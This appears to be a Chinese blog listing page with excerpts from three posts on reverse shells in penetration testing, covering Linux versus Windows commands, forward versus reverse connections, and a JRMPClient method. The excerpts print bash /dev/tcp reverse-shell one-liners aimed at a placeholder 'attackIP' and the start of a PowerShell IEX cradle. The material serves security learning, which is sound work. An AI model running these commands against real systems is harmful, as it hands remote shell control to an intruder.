摘要: 测试时, 首先需要对网站基本信息有一个收集, 要知道它是什么系统, linux与windows反弹shell的命令不同 linux(需要编码处理): bash -i >& /dev/tcp/127.0.0.1/8888 0>&1 windwos(不需要编码处理): powershell IEX (N 阅读全文
posted @ 2021-06-11 23:04 H4ck3rX 阅读(77) 评论(0) 推荐(0)
摘要: 参考文章# 反弹shell的各种姿势powershell反弹shell常见方式 前言# 最近在学内网,就从最基础的知识开始学习、整理 正向连接# 攻击者去连接受害者弊端:当受害者处于局域网内无法使用正向连接;当受害者 IP 实时变化时无法持续连接。 反向连接# 受害者主动连接攻击者 前提# 为什么要 阅读全文
posted @ 2021-06-11 22:04 H4ck3rX 阅读(542) 评论(0) 推荐(0)
摘要: 方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp/atta 阅读全文
posted @ 2021-06-11 22:02 H4ck3rX 阅读(122) 评论(0) 推荐(0)